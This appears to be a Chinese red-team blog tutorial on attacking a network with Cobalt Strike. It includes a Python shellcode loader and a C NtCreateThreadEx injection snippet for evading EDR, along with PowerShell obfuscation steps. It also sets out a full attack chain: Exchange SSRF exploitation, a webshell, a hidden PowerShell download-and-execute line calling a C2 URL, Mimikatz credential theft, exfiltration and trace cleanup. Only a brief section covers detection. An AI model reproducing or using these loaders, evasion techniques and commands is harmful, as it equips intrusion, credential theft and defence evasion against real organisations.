一、为什么Cobalt Strike是防守者的噩梦?
Cobalt Strike(简称CS)是红队作战中几乎无可替代的武器。在防守者眼里,它简直是噩梦的代名词。CS能够提供全面的协作攻击能力,包括但不限于权限提升、横向移动、内存加载免杀、流量伪装等功能,而这些都可以通过简单而直观的界面实现。对于攻击者来说,CS不仅降低了操作门槛,还极大地提升了攻击效率。
防守者通常通过监控网络流量、终端行为以及进程加载来探测攻击活动。然而,高度灵活的CS框架让防守者的工作变得异常复杂。举例来说,攻击者可以使用CS生成的Payload绕过传统的杀毒软件,并结合C2流量伪装技术,几乎隐形地潜入目标网络。
你可能会问,这样一款强大的武器,它的攻击链是怎样的?下面我们会从一个真实的攻击案例出发,完整展示如何使用Cobalt Strike完成攻击,并探讨绕过检测的技巧。
---
二、0x01 攻击环境的搭建与目标选择
在攻击开始之前,必须搭建一个实验环境用于测试。我们选择了一个包含以下组件的模拟企业网络:
- 目标主机:Windows Server 2019,运行IIS服务(目标为内网渗透)
- 受害端点:Windows 10,开启Windows Defender
- 域控服务器:Windows Server 2016,带有Active Directory
- 防守设备:安装EDR(Endpoint Detection and Response)工具的日志服务器
攻击者的基础设施为一台Kali Linux虚拟机,配置了Cobalt Strike 4.x版本。C2服务器位于公网上,用域名指向动态IP。
环境部署步骤
以下是完整的环境搭建流程:
- C2服务器配置
- 安装Cobalt Strike,生成默认的teamserver:
<pre><code class="language-bash"> ./teamserver <公网IP> <密码> `
- 为了便于隐藏C2,我们使用Nginx搭建反向代理:
` ProxyPass / https://your-c2-domain.com/ stealth; `
- 修改
malleable_c2配置文件,添加流量伪装模板。
- 模拟目标网络
- 使用VMware或VirtualBox搭建包含域控、受害者主机和目标服务器的网络。
- 部署常见的Web服务,比如IIS,模拟真实企业环境。
---
三、Payload 构造的艺术
要想成功攻击并绕过检测,Payload的构造至关重要。Cobalt Strike的Beacon是核心组件,支持多种交付方式,比如PowerShell、HTA、EXE等。然而,直接生成的Payload很容易被杀毒软件拦截,因此我们需要对其进行免杀处理。
1. 生成初始Payload
在Cobalt Strike中,生成一个基础的PowerShell脚本:</code></pre>plaintext Attacks > Packages > PowerShell <pre><code>导出生成的Payload代码后,我们需要对其进行混淆和免杀处理。
2. 使用混淆和编码绕过检测
我们采用Invoke-Obfuscation工具对上述PowerShell代码进行混淆:</code></pre>powershell
首先加载Invoke-Obfuscation模块
Import-Module ./Invoke-Obfuscation.psd1
混淆脚本内容
Invoke-Obfuscation -ScriptPath ./beacon.ps1 -Command Command_Obfuscation <pre><code> 混淆后的代码将会变得极其复杂,EDR的特征检测变得更加困难。
3. 内存加载技术
为了避免在磁盘上落地文件,我们可以使用直接内存加载技术。下面是一个简单的Python脚本示例,它将CS的Shellcode加载到指定进程中: </code></pre>python import ctypes import sys
def inject(shellcode): kernel32 = ctypes.windll.kernel32 shellcode_ptr = ctypes.windll.kernel32.VirtualAlloc( None, len(shellcode), 0x3000, 0x40)
将Shellcode写入内存
ctypes.windll.kernel32.RtlMoveMemory( shellcode_ptr, shellcode, len(shellcode))
创建线程执行
thread = kernel32.CreateThread( 0, 0, shellcode_ptr, 0, 0, 0)
kernel32.WaitForSingleObject(thread, -1)
if __name__ == "__main__":
替换为实际的Shellcode
shellcode = b"\xfc\xe8\x82\x00\x00\x00\x60\x89..." inject(shellcode) <pre><code> 这个脚本会直接将Cobalt Strike的Shellcode注入目标进程,避免生成可疑文件。
---
四、绕过EDR:从检测到对抗
EDR对进程行为和内存调用的检测是现代防御的关键。为了绕过这些检测,我们需要更深层的对抗技巧。
1. API Hooking检测规避
大部分EDR会通过API Hooking的方式拦截常见的恶意行为,比如VirtualAlloc和CreateRemoteThread。为了绕过,我们可以使用直接的系统调用来完成注入。
以下是一个调用NtCreateThreadEx的示例,实现了无痕注入:</code></pre>c
include <windows.h>
include <winternl.h>
typedef NTSTATUS (NTAPI *pNtCreateThreadEx)( PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, PVOID ObjectAttributes, HANDLE ProcessHandle, PVOID StartRoutine, PVOID Argument, ULONG Flags, SIZE_T ZeroBits, SIZE_T StackSize, SIZE_T MaximumStackSize, PVOID AttributeList );
void InjectShellcode(HANDLE hProcess, LPVOID shellcode, SIZE_T size) { HANDLE hThread = NULL; HMODULE hNtdll = LoadLibraryA("ntdll.dll"); pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hProcess, shellcode, NULL, FALSE, 0, 0, 0, NULL); WaitForSingleObject(hThread, INFINITE); } <pre><code> 生成的二进制文件不仅可以绕过EDR的Hook检测,还能在目标机器上运行。
---
五、完整攻击链演示
1. 信息收集
通过OSINT(如Shodan)确认目标使用的Web服务类型,并发现目标正在运行一个过时的IIS版本,可能存在已知漏洞。
2. 漏洞利用
利用CVE-2021-26855(Exchange SSRF漏洞)获取目标服务器的初始访问权限,并上传一个Web Shell。
3. 植入Beacon
在Web Shell中执行准备好的PowerShell命令,加载Cobalt Strike的Beacon:</code></pre>powershell powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<C2_URL>/payload.ps1')" `
4. 内网横向移动
利用Mimikatz提取内存中的明文密码,并对域用户执行横向移动。
5. 数据窃取与清理
使用CS的文件浏览器模块下载目标文件后,通过PowerShell删除残留痕迹。
---
六、如何检测和防御Cobalt Strike?
尽管Cobalt Strike是红队的利器,但其行为特征也有迹可循。如果你是防守者,可以尝试以下策略:
- 监控网络流量
- 检测Beacon心跳流量,特别是HTTPS流量中的异常模式。
- 监控进程行为
- 通过EDR或Sysmon检测内存分配和线程注入行为。
- 加强杀毒规则
- 使用VirusTotal分析Cobalt Strike的Payload,并更新本地杀毒规则。
---
七、个人经验分享
作为一名红队攻击者,我发现Cobalt Strike几乎是不可替代的工具。然而,面对越来越强大的防守技术,我们必须不断更新自己的攻击方法,特别是在免杀和绕过方面。
我的建议是:
- 永远不要重复使用同一套Payload,EDR会快速学习。
- 多尝试修改C2流量配置,例如使用合法网站伪装。
- 利用自定义工具,不要完全依赖现成的框架。
总之,Cobalt Strike的技术深度非常值得研究,而它的未来发展将进一步推动防守者的技术进步。